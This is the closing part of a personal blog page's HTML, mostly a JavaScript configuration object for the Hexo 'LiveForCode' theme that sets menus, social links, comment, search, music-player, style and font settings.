            light : "/image/website/logo/logo.png",
            dark  : "/image/website/logo/logo-dark.png"
        },

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/elysia2.jpg",
            
                "/image/header/kiana1.png",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
                "/image/header/home.jpeg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "ctf start！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.jpg"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/Dyinglight5",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.jpg",
            wechat  : "/image/donate/wechatpay.jpg"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Comment : {
            switch : true,
            type   : "Valine",
        },

        Waline : {
            el              : ".comments-content",
            serverURL       : "",
            path            : window.location.pathname,
            meta            : "['nick', 'mail', 'link']",
            requiredMeta    : "['nick', 'mail']",
            pageSize        : 10,
            lang            : "zh-cn",
            locale: {
                admin       : "博主",
                anonymous   : "匿名用户",
                sofa        : "快来做第一个评论的人吧 ~",
                placeholder : "你是我一生只会遇见一次的惊喜...",
            },
            dark            : "html[color-scheme='dark']",
            search          : false,
            pageview        : true,
            comment         : true,
            copyright       : false,
        },

        Valine : {
            el             : ".comments-content",
            appId          : "SVxN9Sk9mzBk4tCi9470dhDQ-gzGzoHsz",
            appKey         : "BWGcit0aZ9zv8JeQWBB0eb2s",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            api      : "https://api.i-meto.com/meting/api",
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css",
            waline           : "/css/waline.css",
            walineCustom     : "/css/waline-custom.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js",
            waline           : "/js/waline.mjs",
            pageview         : "/js/pageview.mjs",
            comment          : "/js/comment.mjs",
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "原神,启动！"
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>